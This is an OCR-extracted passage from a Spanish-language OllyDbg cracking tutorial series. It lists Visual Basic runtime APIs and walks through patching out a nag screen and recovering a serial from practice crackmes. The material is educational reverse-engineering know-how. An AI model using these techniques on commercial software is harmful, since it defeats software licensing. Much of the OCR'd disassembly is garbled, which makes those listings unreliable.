Vemos que para y el error fue salvado y el programa continuara su ejecución perfectamente sin cartel de 
error. 


Como yo vi que era una rutina simple, y no hay modificaciones asumo que retornara a la línea siguiente 
de donde se provoco la excepción, este es el comportamiento normal, aunque la dirección de retorno 
puede ser modificada en el mismo manejador, en ese caso lo mejor es poner un BPM ON ACCESS en la 
sección donde se provoco la excepción e ir apretando F9, lo cual nos hará saltar línea a línea, hasta que 
termine la rutina del manejador y vuelva al programa, allí quitamos el BPM ON ACCESS y continuamos 
ejecutando y vemos claramente donde retorno. 


Por supuesto si queremos parar en el momento que el programa coloca el manejador de excepciones lo 
mejor es poner un HARDWARE BPX ON WRITE en Fs:[0] aunque para muchísimas veces ya que las dll 
también colocan manejadores luego los quitan y al volver al programa dejan el que estaba activo antes, 
pero es una forma de ver como se van colocando y quitando manejadores a medida que corre el programa. 


La otra forma de colocar un manejador de excepción es por medio de la api 
SetUnhandledExceptionFilter, la cual ya vimos su funcionamiento, el parámetro es la dirección del 
manejador donde continuara la excepción siempre y cuando no haya debugger como vimos 
anteriormente. 


Bueno creo que es un primer pantallazo sobre excepciones que nos permitirá ir manejándonos con mas 
profundidad en el cracking, a medida que veamos ejemplos profundizaremos el tema para no ser tediosos. 


Hasta la parte 26 
Ricardo Narvaja 
08 de enero de 2006 


INTRODUCCION AL CRACKING EN OLLYDBG PARTE 26 


CRACKEANDO VISUAL BASIC EN OLLYDBG 


En las subsiguientes partes aprenderemos a crackear programas hechos en VISUAL BASIC en 
OLLYDBG, ya se me dirán algunos que para que existe una herramienta tan buena como 
SMARTCHECK, pero aquí este curso trata sobre cracking en OLLYDBG y trataremos siempre de 
utilizarlo al mismo antes de otras herramientas, en caso de que no podamos de ninguna forma con 
OLLYDBG o que se nos complique mucho, solo en ese caso, recurriremos a otras TOOLS. 


Antes que nada les haré un regalito es este OLLYDBG ya conocido en la lista crackslatinos y es especial. 


http://www.ricnar456.dyndns.org/HERRAMIENTAS/L-M-N-Ñ-O- 
P/OLLY%20PARCHEADO%20PARA%20BUSCAR%200EPs.rar 


Se llama OLLYDBG PARCHEADO PARA BUSCAR OEPs, que como vemos se utiliza mas que nada 
para desempacar, pero en Crackslatinos yo lo dije cuando lo envié, también es muy útil, para los 
programas en VISUAL BASIC en NATIVE code, no así para los hechos en P-CODE. 


Pues cuales la diferencia entre ambos, ya veremos también capítulos de P-CODE pero el VISUAL 
BASIC NATIVE CODE es el visual común que ejecuta instrucciones en la sección code del programa, 
mientras que el P-CODE no ejecuta la sección code, solo se ejecuta la dll de visual y lee bytes del la 
sección code del programa como indicación de que comando querés ejecutar. 


O sea si un programa de VisualBasic nunca vuelve a ejecutar líneas de código en la sección code, pues es 
casi seguro que es P-CODE del cual estudiaremos su forma de trabajar mas adelante. 


Pues que particularidad tiene el OLLY este que parchee?, que si colocas un BPM ON ACCESS no para 
ON READ y ON EXECUTE, sino que para solo ON EXECUTE y esto es muy útil para hallar OEPs y 
para Visual Basic ya que si no el programa para miles de veces en la dll de Visual, y el tema es aquí 
siempre volver al código del programa, no empantanarmnos traceando en las dll de VisualBasic lo cual te 
lleva a error seguro y a trabajar de mas. 


También para trabajar en Visual Basic es necesario conocer las apis de VB, las cuales son diferentes a las 
apis comunes y no se encuentran en el WINAPIS32. 


Por lo demás hay muchísimos tutes con Puntos especiales para VB, y técnicas geniales que no usaremos y 
el que quiere consultarlas, puede ver al el NUEVO CURSO de Crackslatinos los tutes de COCO y otros 
integrantes de la lista que pueden hacer mas fácil la tarea, aquí lo haremos como si no conocemos ninguna 
de esas técnicas y lo tenemos que crackear solo con este OLLY especial. 


El mismo se coloca en la misma carpeta del OLLYDBG común, y lógicamente elegiremos usar este 
OLLY solo cuando crackeemos VB o cuando busquemos OEPs o alguna tarea que requiera que los BPM 
ON ACCESS funcionen realmente como BPM ON EXECUTION solamente. 


Por supuesto si estamos crackeando con este OLLY, si necesitamos un BPM ON ACCESS real que pare 
ON READ y ON EXECUTE no podremos usarlo, o debemos arreglarnos con los HARDWARE BPX ON 
ACCESS que pueden a veces cumplir la función. 


El problema máximo que hay con las apis de Visual Basic es que no es una información que Microsoft 
suministro ni suministra, por lo cual no hay un winapis32 con apis de VisualBasic ni nada de eso, lo mas 
que podes hacer es buscar el nombre de la api en GOOGLE y ver si tenes suerte de encontrar alguna 
pagina donde se use y explique como y para que sirve, antes de comenzar a crackear recopilare en este 
tute lo poco que encontré sobre apis y info. en general sobre visual Basic, cosa de que también puedan 
consultar este tute para saber algunas apis que significan. 


SIGNIFICADO DE LAS PARTES DEL NOMBRE DE UNA API DE VISUAL 
En las apis encontraremos estas abreviaturas como parte del nombre de las mismas. 


bool Boolean 

str String 

12 Integer (2 bytes) 

ui2  Unsigned integer (2 bytes unsigned integer) 
¡4 Long (4 bytes integer) 
rá Single (4 bytes real) 
r8 Double (8 bytes real) 
cy Currency 

var Variant or variable 

fp Floating point 

cmp compare 

comp compare 


Aquí en esta la tabla se ven las definiciones de los tipos de variables, pues combinando los tipos de 
variables se entiende mucho sobre que hace cada api. 


Tipo de variable Valor 


Valor Entero 
Valor Entero Largo 


Valor Real 


Valor Real Doble 


unto Fijo 
Fecha 
Re 


Variant Cualquiera 6-22 Bytes ys: asta el intervalo Double 


+ longitud ed 1 
Por ejemplo: 
__vbal2Str quiere decir que convierte una string en un entero, por ejemplo. 
Aquí hay más definiciones: 


1) Ejemplos de apis de conversión de datos: 


i) __vbal2Str Convierte una String a Integer 
ii) __vbal4Str Convierte una String a Long 

iii) __Vbar4Str Convierte una String a Single 
iv) __vbar8Str Convierte una String a Double 
v) VarCyFromsStr Convierte String a Currency 
vi) VarBstrFroml2 Convierte Integer a String 


Vemos que con las abreviaturas que vimos al inicio nos damos cuenta por donde vienen los tiros, aquí hay 
mas apis. 


2) Moviendo datos 


i) _ vbaStrCopy - Copia una String a memoria 
1i) _ vbaVarCopy - Copia una Variable a memoria 
1ii) __vbaVarMove — Mueve una Variable en la memoria 


3) Mathematical 


i) __vbavaradd — Suma de dos Variables 

ii) __vbavarsub — Resta dos Variables 

11i) — vbavarmul — Multiplica dos Variables 

iv) _ vbavaridiv - Divide dos variables dando como resultado un Integer 
v) _ vbavarxor — function XOR 


4) Miscelaneas: 


i) — vbavarfornext - Loop 

ii) — vbafreestr — Libera una String que no se utiliza 

iii) _ vbafreeobj — Libera un Objeto que no se utiliza 

iv) — vbastrvarval — Toma el valor de una ubicación especifica en una String 

v) multibytetowidechar — Cambia una String a formato ancho 

vi) rtcMsgBox — Muestra un message box — similar a Windows API messagebox/a/exa 

vii) _ vbavarcat — Une dos variables 

viii) _ vbafreevar Libera una Variable que no se utiliza 

ix) _ vbaobjset Activa un Objeto 

Xx) — vbaLenBstr — Obtiene el largo de una string 

xi) rtcinputBox — Muestra una Input Box de Visual Basic — similar a Windows API 
getwindowtext/a, GetDlgltemtext/a 

xii) __vbaNew — Muestra una caja de dialogo — Similar a Windows API Dialogbox 

xiii) — vbaNew2 - Muestra una caja de dialogo Similar a Windows API Dialogboxparam/a 

xiv) rtcTrimBstr — Recorta una String 

xv) __vbaEnd -— Finalizacion del Programa 

xvi) _ vbaLenVar - Obtiene el largo de una variable 


xvii)  rtcMidCharVar —Toma un determinado carácter de una string para trabajar con el. 
xviii)  _rtcDir— Busca si existe una fila. 
xix) — vbaFileOpen — Abre una fila. 


5) Comparaciones: 


i) — vbastrcomp — Compara dos Strins - Similar a Windows API Istremp 
1i) — vbastrcmp - Compara dos strings - Similar a Windows API Istrcmp 
iii) — vbavartsteq - Compara dos variables si son iguales 

iv)  _ vbaFpCmpCy - Compara Floating point con Currency 

v) _ vbavartstNe - Compara dos variables si no son iguales 


Estas definiciones son para dar una idea de que esta haciendo el programa en ese momento, ya que no 
tenemos mucha ayuda, quizás no sean perfectas, pero nos ayudaran, asimismo hay muchas mas 
combinando lo que vimos nos daremos cuenta que hace la api. 


Asimismo aunque por ahora no veremos cracking en SMART CHECK en esta pagina tiene lo que quieren 
decir los comandos extraños para el cracker que vemos en el. 


http://www.w3schools.com/vbscript/vbscript_ref functions.asp 


Por ejemplo el Smartcheck nos muestra la función ASC, o MID que no corresponde a lo que vemos en 
OLLYDBG si no al lenguaje de Visual Basic de programación, pero en esa página esta detallado que 


significa cada posible comando y sus parámetros por lo cual el cracking en SMART CHECK se facilita 
mucho. 


Por ejemplo en SMART CHECK vemos el comando LEN que corresponde a la api__vbaLenVar, 


— a > — 


Function [Description | 


InStr Returns the position of the first occurrence of one 
string within another. The search begins at the first 
character of the string 


InsStrRew Returns the position of the first occurrence of one 
string within another. The search begins at the last 
character of the string 


LCase  [Convertsa specified string to lowercase 


Left Returns a specified number of characters frorn the 
left side of a string D 


Trim [|Removes spaces on the left side of a string 
RTrim  [|Removes spaces on the right side of a string 


Trina Removes spaces on both the left and the right side of 
a string 
Returns a specified number of characters from a 
string 

Replace Replaces a specified part of a string with another 
string a specified number of times 


En la pagina vemos que esta la definición de LEN. 


The Len Function 


The Len function returns the number of characters in a string. 


Syntax 


| Len(string|varnamej) 


Parameter 


Description 


string A string expression 


varname A variable name 


Pues para los que tienen problemas para usar el SMART CHECK eso los ayudara, aunque en este tute no 
veremos su uso, creo que ningún tute de SMART CHECK da una ayuda sobre ciertas expresiones usadas 
por el mismo, creo que eso servirá, por eso lo agregue aquí. 


Bueno ya sabido todo lo anterior encaremos el cracking del CrackMePls 


Abramos el mismo en el OLLYDBG parcheado por mi, que les di el link al inicio. 


PEE 0) 4) 4/0] +) 1JEjmjtjwnje) 


63 30154006 |PUSH CrackMeP. 004061530 


EEFFFFFF 
7 ADD EYTE PTR DS:CEAX], AL 
ADD BYTE PTR DS: [EAX],AL 


ADD BYTE PTR DS: CEAX], AL 
XOR BYTE PTR DS: [EAXJ1, AL 
AE ENE PTR DS: [EAXJ, AL 


Este crackme es muy sencillo tiene una nag que eliminar y el serial que hallar, veamos, demos RUN. 


Project1 [X] 


Remove me! 


Sale la nag, la cual varia de texto cada vez que la corremos, es tipo MessageBoxaA, así que en VisualBasic 
eso corresponde a la api rtcMsgBox, si pongo un BP en dicha api. 


Command Bp richisgBox _ 


Module PAárchivos de nranramalYahonlkMes 


Y reinicio a ver si para antes de que salga la nag 


ia 11 +] $4] + 1/Ejm]T/wWH] 
PUSH_EBP 

MOU EBP,ESP 

SUB ESP, 4C 

MOU ECX, DWORD PTR SS: [EBP+14] 

PUSH EBX 

PUSH ESI 


PUSH EDI 
CMP WORD PTR DS: [ECX1,0A 
MOU EAX, 390020004 


CMP DWORD PTR_DS: [ECX+8],ERX 


Allí paro, no tenemos ayuda de parámetros ni nada, pero no importa. 


Veamos de donde fue llamada esta api como siempre aunque no diga RETURN TO el primer valor del 
stack es la dirección de retorno de la api, si no, lo analizamos aquí nuevamente y aparece la info. 


to CrackMeP. 66403; 


BB4B3209 
Ba12F9C4 
5/s151515]51515) 
Bu12F9B4 
Ba12F9A4 


am mm a 


DWORD Ti ¡LEDO ELIJA CDA 


735 Cá4 g3D0' mou DWORD PTR Ss: [EBP-3C],8 


MSUBUMEB. _vbaFreeStr 


LEA EAx, DWORD PTR SS: [EBP-6C] 
LEA ECx, DWORD PTR SS: [EBP-5C] 


DUIca cn 


Allí esta el call a la api y abajo lógico el punto de retorno que es 4032d9. 


3975 B4 MOU DWORD PTR SS: [EBP-4C],ESI 


. 8250 D4 MOU DWORD PTR SS: [EBP-2C],EBx 
. 1745 C4 638801 MOU DWORD _PTR SS: [EBP-3C],8 
. FF1S 54104001 MSUBUMEO. rtcMsgBox 
. 2040 DS LEA ECX,DWORD_PTR SS: [EBP-28] 
. FF1S 6011400 MSUBUMEB. _vbaFreeStr 
. 8D45 94 LEA EAX, DWORD PTR SS: [EBP-6C] 
- 8D4D A4 LEA ECX, DWORD PTR SS: [EBP-5C] 
. 50 PUSH_EAX 
+ 8D55 B4 LEA EDX, DWORD PTR SS: [EBP-40] 
+ Si PUSH_ECX 
OnAC PA LEN EN Mino DTD Ss. TODD 271 
«SU UWURO S51 LEBP-2Z2LJ,EBX 
. Cr45 24 la l=131] mou DWORD PTR SS: [EBP-3C],8 
. 5O4b oa MSUBUMED. rtcMsgBox 
. FF1S 6C11400 MSUBUMEB. _vbaFreeStr 
. 8D45 94 LEA ERX, DWORD PTR SS: [EBP-6C] 
- 8D04D A4 LEA ECX, DWORD PTR SS: [EBP-5C] 


SA PIUISH FAX 


Remove me! 


Acepto y para en el retorno. 


7C92056D 
DO3CB60S 
LJ 1515151515) 
' Bu12F918 

' BO12FADO 
51 BBBBBBBA 
30020004 


' 10403209 


EAX =1 significa que la api se ejecuto con éxito, ahora reiniciemos, intentaremos nopear la nag de alguna 
forma. 


Reiniciamos y para en el call 


OR ES ea] vie] $0) e] + 1]Ejm]T[wjH] e] 4] 


MSUBUMEE 


MSUBUMGE 
LEA ER%, DWORD PTR SS: [EBP-6C] 
O PTR SS: [EBP-5C] 


Si hago en la línea de retorno CLICK DERECHO -NEW ORIGIN HERE continuara ejecutándose desde 
alli, sin salir el cartel, es como una simulación de que ocurriría si nopeo el call. 


(5) MU] 


Za Fi 9) 


5) MOS HENO MES IS ION ESA HE) FE HA A Y 


FFIS 5410400 MSUBUMEO. rtoMo 
E 0611490 CAL ¿MSUBUI 
8D45 94 LEA EAX, DWORD PTR SS: LEBP-6C] Backup 
8040 ñ4 LEA ECX, DWORD PTR SS: LEBP-5C] | Co 
7 PUSH _EAX py 
8D55 B4 LEA EDX, DWORD PTR SS: CEBP-4C] A 
51 PUSH ECX Binary 
8D45 04 LEA EAX, DWORD PTR SS: CEBP-3C] 
52 PUSH EDX Assemble 
SA 04 PUSH a tel 
abe 
aca da ADD ESP OLA 
o és a1szauea |PUS CrackMeP. 00403341 leds 
4) A ” 
> pan packite Breakpoirt 
F645 FC 04 |TEST BYTE PTR SS: [EBP-9],4 h 
4 89 Hit trace 
8D4D DC LEA ECX, DWORD _PTR SS: LEBP-24] 
FF15 DC104001 Run trace 
8D4D D4 LEA ECX, DWORD PTR SS: LEBP-2C] 
8D55 Dg LEA EDX, DWORD PTR SS: [EBP-28] 
51 PUSH ECX 
52 
6A B2 
FF15 DS104001 


eu] oie je] ] +] 1]ej[mt[wjH|c/+]É/B/Rr]... s] 
MSUBUMGB. rtoMsgBox 
8D4D DS E q D “HlE 


MSUBUMGB. _vbaFreeStr 
LEA EAX, DWORD PTR SS: LEBP-6C] 


LEA ECx, DWORD PTR SS: [EBP-5C] 
PUSH EAX 


Allí esta demos Run a ver que pasa 


[—— [Teminated 


Evidentemente la solución de nopear el call a la api no funciona, probemos otra, reiniciemos. 


D4 
C4 68001 MOU DWORD _PTR SS: [EBP-3C],8 


5410400 

Ds LEA ECX, DWORD_PTR SS: CEBP-28] 
6011400 
94 LEA EAX, DWORD PTR SS: LEBP-6C] 
As LEA ECX, DJ ARD PTR SS: [EBP-5C] 


MSUBUMGA. rtoMsgBox 
MSUBUMGO. _vbaFreeStr 


MSUBUMEO. rtoMsgBox 
MSUBUMGO. _vbaFreeStr 


Y mi 
LEA ECx,DWORD_PTR SS: [EBP-28] 


LEA EAx, DWORD PTR SS: LEBP-6C] 
LEA ECx, DWORD PTR SS: [EBP-5CJ 


PUSH_EAX 
LEA EDx, DWORD PTR SS: LEBP-4CJ 
PUSH_ECX 
LEA EAX, DWORD PTR SS: [EBP-3CJ 
PUSH EDX 


-o000 


6A D4 
FF1S 1010400 
8304 14 


ADD ESP, 14 
9E WAIT 
68 41334000 |PUSH CrackMeP. 00403341 
JMP SHORT CrackMeP. 90403349 
F645 FC 64 [TEST BYTE PTR SS: [EBP-4],4 
74 09 


MSUBUMEGB. _vbaFreeVarL ist 


MOD 


v 
.v JE SHORT CrackMeP.B0483314 

. [5 DC LEA ECx,DWORD_PTR SS: [EBP-24] 

FF1E APOAOM POLAR PTAS AMAIA RES MAUIRIMAA 


umhaFroo! lar 


Llego al JMP y sigo traceando con F8 


Trio 1 Lutuo 


38304 14 
9B 

68 41334000 
EB 3B 

F645 FC B4 
74 B9 


ADD_ESP, 14 


Ao. o. 


AE 


LEA ECx, DWORD 


38D55 DS LEA EDI DWORD 


51 
6A B2 

FF1S Ds104001 
2D45 94 

3D4D A4 
50 

3D55 B4 
51 

3D45 C4 
52 


LEA EAX, DWORD 
LEA ECX, DWORD 
PUSH_EAX 
LEA EDX, DWORD 
PUSH_ECXx 
LEA EAX, DWORD 
PUSH EDXx 


ADD ESP, 20 


O O 


3 
8B4D BC 


EA ECxX,DWORD_PTR SS: [EBP-24] 


8040 DC 
FF1S 0C104001 CALL DUDRO PTR DS: C<ASUBUMEO. _vbaFreel 
8D4D D4 


PUSH EC 
PUSH EDX 

PUSH 2 

CALL_DWORD_PTR_DS: [<2MSUBUMED._vbaFree! 


PUSH EAX 

6A 4 

FF1S 10104061 CALL_DWORD PTR DS: [<2MSUBUMED. _vbaFreel 
8304 20 


és as a dira to BB4c 


PTR SS: [EBP-2C] 
PTR SS: [EBP-28] 


PTR SS: [EBP-6C] 
PTR SS: [EBP-SC] 


PTR SS: [EBP-4C] 
PTR SS: [EBP-3C] 


HOVDWIIDO.,, VIT PEEVIDPCL > 


MSUBUMGO. _vbaFreeVar 


MSUBUMGO. _vbaFreeStrL ist 


MSUBUMGO. —_vbaFreeVarL ¡st 


Antes del JMP hizo un PUSH 403341 y salta a un RET quiere decir que esta usando el RET como un 
salto a 403341, allí ollydbg lo aclara RET USED AS A JUMP TO 403341, por eso no aparece en el stack, 
jeje este truquito es para evitar que nos fijemos en el stack hacia abajo los retornos de los calls y 
lleguemos a la zona de 403341 mirando solamente el stack, este truco previene eso, sigamos traceando. 


. ->o 
> Cc3 RET used as 
> 8B4D ac 79 ECX, DWORD PTR SS: LEBP+CI 
+. 8B55 DC MOU EDX,OWORD PTR SS: [EBP-24] 
. 28B45 Eb MOU EAX, DWORD PTR SS: [EBP-201 
o Ez POP EDI 
. sil MOU DWORD PTR DS: [ECX],EDXx 
. 8B55 E4 MOU EDX, DWORD PTR SS: [EBP-1C] 
. '5E POP ESI 
» “5B POP EBX 
. 28941 04 MOV DWORD PTR DS: [ECX+4],EAX 
. 8B45 ES MOV EAX, DWORD PTR SS: CEBP-18] 
. 8951 083 MOU DWORD PTR DS: [ECX+8],EDX 
. 2891 ac MOU DWORD PTR DS: [ECX+CI,EAX 
. 2B4D EC MOV ECX, DWORD PTR SS: CEBP-14] 
. 3300 FOR EAX, EAX 
. 64:399D 50001 MOV DWORD _PTR FS: [6],ECXx 
C ES MOU ESP,EBP 
. POP EBP 
c [515]5] haga 
>” E9 67DEFFFF 
NOP 
FFIS 2010400 MSUBUMEB. _vbaFreeVar 


ES DBF2FFFF 


39835 2CFFFFFI MOV DWORD PTR SS: CEBP-D4],EAXx 


Allí esta acabamos de salir del call que esta en 402f95 pero eso no estaba en el stack gracias al truquito 
que uso para disimular este CALL y no mostrar la dirección de retorno. 


Pongamos un BP en este call y reiniciemos 


AE CUNDT aa mad ARACENA 


+ 8D95 7?4FFFFFILEA EDX, DWORD PTR SS: [EBP-8C] 
52 PUSH EDX 


R_SS: [EBP-8C] 


8985 2CFFFFFIMOU DWORD PTR SS: [EBP-D4],EAx 
8835 34104001 MOU ESI,DWORD PTR DS: [<8.MSUBUMED. 


FFD6 
. 338D_2CFFFFF CMP_ DWORD, PTR SS: [EBP-D04] 


vbaSt MSUBUMEO. 
EDI 


MSUBUMEO. 


<8MSUBUMGO. 


vbaFreeVar 


vbaSetSystemError 
—vbaSetSystemError> 


U0I4vUZEr ob 
aB40a D 
aBn4 
Ba4an2 FS4 


Y ELA, UWURDO FIN UD¡LE>I 


ru 
s09s TAFFFFF ss A EDX, DWORD PTR SS: TEBP- 801 


PUSH ESi 
FF91 9cazesa CALL_DWORD PTR DS: [ECX+78C] 


Bu4D2F9B 
BB4B2FAL 
BO4B2FA? 
ARGASFAS: 


308D ?4FFFFFI LEA ECx,DWORD_PTR SS: [EBP-85C] 
FF1S 0C104001 
ES DOF2FFFF 
2985 22FFEFFFL MANU MINRA PTR SS: PFRP-N41. FAX 


DT O 


Nopeemos el call a ver si corre sin la nag 


CrackMeP. 00401E74 
MSUBUMGO. _vbaFreeVar 


8D95 74FFFFFÍ LEA EDS, DWORD PTR SS: CEBP-80] 
52 PUSH EDX 
56 PUSH ESI 
FF91 0CO7000 PrackMeP ARÁM1E74 
2D8D a PE ECX,DWORD_PTR SS:ll pac » 
FF1S BC10400 ackup reeVar 
ES DOF2FFFF 
8985 2CFFFFFI MOU DWORD PTR SS: LEBP-1 COpy » 
28835 34104001 MOU ESI,DWORD PTR DS:[: - ] 
FFDS CALL ESÍ Binary 4 Edit Ctr 
3980_2CFFFFFI CHP DWORD_PTR SS: CEBP-1 
JE SHORT CrackMeP. 0040; illo 
A Lc Assemble Space Fill with 00's 
EB 0 DIUICL 4 Comment 
. QU72 ("FTTFrrriLcmA ELA DWORD Tin 22 LEDT”OLJ 
E PUSH EDX 
. 56 PUSH ESI 
El] NOP 
98 NOP 
90 NOP 
1402F93 El NOP 
1402F99 El] NOP 
1M4B2F9A El) NOP 
B4B02F9B| . SDSD 74FFFFFI LEA ECX,DWORD_PTR SS: LEBP-8C] 
B4 . FF15 0010499 MSUBUMGD. _vbaFreeVar 
a4 > ES DBF2FFFF 
B4 . 8985 2CFFFFFI MOU DWORD PTR SS: CEBP-D4],EAX 
B4 . 8B35 34104001 MOU ESI,DWORD PTR DS: [<2MSUBUMEO. _vbaSí MSUBUMGO. _vbaSetSystemError 
B4 . FFD6 <2MSUBUMEGD. _vbaSetSystemError> 
B4 -  398D_2CFFFFFÍ CMP_DWORD_PTR SS: [EBP-D4], EDI 
AAA DECÍA . 


Demos RUN 


Bye bye nag, jeje ya veremos mas adelante muchos ejemplos de remover nags, pero bueno este es sencillo 
salvo ese pequeño truco, la cuestión es ir saliendo desde la nag hacia los retornos de los calls, para ver si 
se puede nopear alguno de los calls anteriores, para evitar la aparición de la misma. 


Allí tenemos el crackme tipeemos el serial bueno y dejémoslo RUNNING. 


Crackme by: ... 


Ahora veremos el uso que le damos al OLLY este parcheado, lo mejor es intentar poner un BPM ON 
ACCESS (execute) en la sección code, vayamos a M. 


L/El BOREuRpoRoy =p?) 


00400000| 00001000| CrackMeP PE header Imag|E RUE | 
0401000 00004000 CrackMeP. text nade. iminrt: Tmao'R RIF 
00405000 | 00002000| CrackMeP li 
00407000 | 00061000| CrackMeP|  Actualize 
00410000| 0000E090 a 
00400099 | 00BB20BB View in Disassembler Enter 
DOCFOOGO| a01Asano Dump in CPU 
ump in 
00SFO000| 000BSO0a P 
009F9000| 00010090 Dump 
DOE 40000 | aabasado 
os cacas sad med 
O0E70000| 00BB100B Search next Ctri+L 
ODEFO000| 00004990 
5B150000|00001000| uxtheme 
5B151000| 00930090 | uxtheme Set break- -ON-access F2 
5B191000|00001000|uxtheme | 
5B192000| 00004900 |uxthene 
5B196000| 00002000 |uxtheme 
60300000|00001000| idle 


60301000| 00001900| ¡dl ' 
énancanal anmatanal ¡die Set memory breakpoint on write > 


Set memory breakpoint or 


Recordemos que en este OLLY eso es un BPM ON EXECUTION, no para cuando lee y escribe en la 
sección ejecutando la dll de visual y eso es lo que necesitamos, volver rápido al programa y evitar las 
miles de veces que para ON READ antes de volver. 


Apreto OK 


— Y Y Y Y y A a —=y KT Y Y E AY Y Y 


. 816024 64 3FISUB DWORD PTR SS:LESP+41,3F 
E9 BEODG0aa 
816024 04 431 SUB DWORD PTR SS: [ESP+4],43 
E9 4100000 | JMP CrackMeP.00482CAB 

816024 04 3B/ SUB DWORD PTR SS: [ESP+4],3B 
E9 A4BEG00B_ | JMP CrackMeP. 06402010 
. 816024 04 FFÍ SUB DWORD PTR SS: [ESP+4],0FFFF 
.v E9 F7110000 | JMP CrackMeP. 00403070 
316024 04 FFÍ SUB DWORD PTR SS: [ESP+4],0FFFF 
E9 FAL4B00B_ | JMP CrackMeP. 06403389 
316024 04 FFÍ SUB DWORD PTR SS: [ESP+4],0FFFF 
E9 0D170000_|JMP CrackMeP. 00403540 
816024 04 371 SUB DWORD PTR SS: [ESP+4],37 
ES 201800090 


[ala] DB 60 


Ae 


Le, 
[na] 
o 
o 


DOS OO0OOE 


Al 
3 
3 
3 
3 
3 
3 
3 


»u PUSH EHX 
56 PUSH _ESI 


8970 DC MOU DWORD _PTR SS: [EBP-24], EDI 
16070081 CALL_DWORD_PTR DS: CEDX+716] CrackMeP. 00401E8E 
DC LEA ECX, DWORD PTI 


R_SS: [EBP-24] 
FFIS OC104001 MSUBUNGA. _vbaFreeVar 
897D FC____ |MOU DWORD PTR SS: LEBP-41, EDI 


mn 


com 
3 ER 
5Ñ 


Llegamos a ese call recordamos pasar por encima los calls a apis, y entrar en los calls internos del 
programa. 


Entonces entramos con F7 


A00BBaGa 


7D 12 
68 ADOBGBBa | PUSH BA 
= 04244000 | PUSH dis 


PUSH_EBP 
MOU EBP,ESP 


33EC ac SUB ESP,BC 
68 D6114000 |PUSH_<JMP. 2 MSUBUMEO. —_vbaExceptHandler> 
64:A1 B0B0BOÍ MOU EAX, DWORD PTR FS: [6] 


si PUSH_EAX 
64:8925 06001 MOU DWORD PTR FS:[61,ESP 
3EC 54 54 


SS: [EBP-C],ESP 


PTR SS: 
PTR SS: [EBP+8] 


DS: [ECX],ERX 


DWORD PTR 

DWORD PTR 

DWORD PTR , 

DWORD_PTR SS: [EBP-54],EAX 
MOU EBX, DWORD PTR DS: [<8.MSUBUMGO. _vbaD 
PUSH_EAX 


LEA EAX, DWORD PTR SS: [EBP-30] 
PUSH EAX 


MOU EDI,EAX 
LEA EDx, DWORD PTR SS: [EBP-28] 
PUSH EDX 


PUSH_EDI 
MOU ECX,DWORD_PTR DS: CEDIJ 


TEST EAX, EAX 
FCLEX 


S: [EBP-30],EA% 


MOU EAX, DWORD PTR SS: [EBP-28] 
MOU ECX, DWORD PTR DS: [ESI+34] 
PUSH EAX 


SE handler installation 


MSUBUMEO. _vba0bjSet 


<2MSUBUMGO. _vbaObjSet > 


MSUBUMGA. _vbaHresu ltCheckObj 


MSUBUMGB. _vbaStrCmp 


Llegamos a la posible parte caliente abajo vemos __vbaStrCmp que es una posible comparación de 
strings, pongamos un BP allí y quitemos el BPM antes de dar RUN. 


50 


PUSH EAX 
PUSH ECx 


MOU EDI,EAX 
LEA ECX, DWORD PTR SS: [EBP-28] 
NEG EDI 


SBB EDI.EDI 


00000005 


0012F444 
Bu12F4C0 
SI 0014E118 
OBEBBSFC 


E 


INDDO 
DD o 


Xx BB14F?DC UNICODE ” 
0014FC74 UNICODE * 


6600969 MSUBUMEO. —_vbaDb, 


> BB4B3627 CrackMeP. 0040 
it OLFFFFFFFF) 


ji 


(FFFFFFFF) 


it DLFFFFFFFE) 
it OLFFFFFFFF) 


SPCFaranatrrrs 


MSUBUMGO. _vbaStrCmp 


Vemos que compara la string que ingrese 989898 con el serial correcto, copiémoslo. 


A |Registers (FPU) 


B014F7DC UNICODE "989898." 
aB14FC7?4 Mn ad AS RS 
esecada  Increment 
ac r44 — Decrement 
0014E115 
OBEBBSFO Zero 

ES 6b1E 

SS 0B23 Modify 


“ 


El 


DS dese Copy selection to clipboard C 


AAA] — Copy all registers to clipboard 
LastErr j 


D000B24E Enllnr in Pura 


Y peguémoslo en el bloc de notas 


Archivo Edición Formato Wer 


Ayuda 


EAX O014F7DC UNICODE "989898." 
ECX O014FC74 UNICODE "E2!aNgPiNoy" 
EDX 00000000 


EBX 660D9469 


ESP 0012F444 
EBP 0012F4C0 
ESI 0014E118 
EDI ODE008SFC 
EIP 00403627 CrackMeP. 00403627 


0 ES 
TI: ES 
0 ss 
1 Ds 
0 FS 
0 GS 
0 


E SD 


0023 32bit OCFFFFFFFE) 
001B 32bit OCFFFFFFFF) 
0023 32bit OCFFFFFFFF) 
0023 32b1it OCFFFFFFFE) 


MSVBVWM60. _vbaobjset 


0038 32bit 7FFDFOOOCFFE) 


0000 NULL 


Lo a PARMA MAPA LAMA 


De allí lo podemos copiar al serial correcto fácilmente 


rchivo Edición Formato Wer Ayuda 
ix DO14F7DC UNICODE "989898." 


IX 0014FC74 UNICODE 


1x 00000000 


5P 0012F444 
3P 0012F4C0 
51 0014e118 
JT OD0E00SFC 
P 00403627 CrackmeP. 00403627 


e PER CAMA alla Aire 


ME?! anNgPI1NOypY 


3X 660D9469 MSVBVWM60. _vbaobjset 


Deshacer 


Cortar 


Probémoslo pegándolo en la ventana del crackme 


Yes this is correct 


h 


Bueno resuelto, por supuesto hay que guardar los cambios del nopeo de la nag para que corra para 
siempre sin la misma. 


En la parte 27 seguiremos profundizando el cracking en Visual Basic, con ejemplos mas complejos y ya 
empezaran a trabajar ustedes tambien. 


Hasta la parte 27 
Ricardo Narvaja 
10 de enero de 2006 


INTRODUCCION AL CRACKING CON OLLYDBG PARTE 27 


Seguimos con Visual Basic 


Bueno seguiremos con Visual Basic aquí tenemos un crackme en el que hay que quitar una nag, yo lo 
hice a mi modo, que me sirve para cualquier caso (me gusta razonar e intentar), y quite la nag a mi forma, 
por supuesto use el OLLYDBG especial para VB que vimos en la parte anterior, luego de ver como lo 
solucione, veremos el método mecánico que ahorra tiempo, pero yo pienso que hay que saber solucionar 
o por lo menos intentar usando los métodos de intentar y probar, lo que uno aprende intentando es muy 
importante, de allí que hago este tute con mi forma de quitar la nag, al final les mostraré el método 
mecánico también porque hay que saber y usar de todo. 


Killme es el adjunto que tiene el crackme que vamos a estudiar, en este no hay serial solo una nag 
molesta que hay que evitar que aparezca y que corra el programa que viene a continuación. 


Si lo corro fuera de OLLYDBG veo la nag 


Veo que tiene un botón deshabilitado y un timer que va desde cinco disminuyendo hasta cero y cuando 
llega a cero, se habilita el botón CONTINUE y al apretarlo. 


> >» NR AA sa 10m 


